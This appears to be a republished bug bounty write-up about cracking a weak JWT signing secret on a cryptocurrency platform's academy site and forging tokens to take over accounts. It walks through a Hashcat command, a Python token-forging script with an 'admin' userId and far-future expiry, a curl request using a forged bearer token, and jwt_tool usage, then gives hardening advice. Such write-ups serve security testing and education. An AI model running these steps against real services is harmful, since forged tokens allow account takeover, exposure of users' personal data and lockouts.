My Journey in Bug Bounty: How I Found My First Bug (A Long Time Ago)

By /

Listen to this Post

Featured Image
A while ago, I was analyzing the main website of a cryptocurrency platform within a public bug bounty scope when I found a link to an academy platform. After understanding the application and its functionalities, I discovered that authentication was done via JWT tokens. Initially, I tried cracking the secret key with Hashcat, expecting no success—but surprisingly, it worked almost instantly.

With the key in hand, I manipulated the `userId` claim (though not more generic fields like email). This allowed me to “take over” any account, access personal information (email, phone number), and even change passwords, locking out legitimate users. Additionally, I bypassed session expiration by forging infinite tokens, affecting both web and mobile versions.

You Should Know:

1. Cracking JWT Secrets with Hashcat

JWT tokens often use weak secrets. To test for this vulnerability:

1. Extract the JWT Token (from cookies/headers):

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

2. Prepare a Wordlist (e.g., `secrets.txt`):

echo "secret" > secrets.txt 
echo "password" >> secrets.txt

3. Run Hashcat:

hashcat -a 0 -m 16500 jwt.txt secrets.txt --force

2. Manipulating JWT Claims

Once you have the secret, forge tokens using:

  • Python Script: 
    import jwt 
forged_token = jwt.encode({"userId": "admin", "exp": 9999999999}, "secret", algorithm="HS256") 
print(forged_token)

3. Testing Session Fixation

Check if tokens expire:

curl -H "Authorization: Bearer <forged_token>" https://target.com/api/user

4. Mobile App Testing

Intercept mobile traffic with Burp Suite:

  • Configure proxy on Android using: 
    adb shell settings put global http_proxy 192.168.1.2:8080

What Undercode Say

JWT vulnerabilities are common due to weak secrets, misconfigurations, and poor validation. Always:
– Use Strong Secrets: Avoid common words (secret, password).
– Validate Token Expiry: Enforce short-lived tokens.
– Restrict Claims: Do not allow user-controlled fields like userId.

For further hardening:

 Check for JWT vulnerabilities with jwt_tool: 
git clone https://github.com/ticarpi/jwt_tool 
python3 jwt_tool.py <JWT_TOKEN> -C -d secrets.txt

Expected Output:

A detailed analysis of JWT weaknesses, including cracked secrets and forged tokens.

Note: Always test responsibly and within legal bounds.

References:

Reported By: Davidkarpinski01 Bbp – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: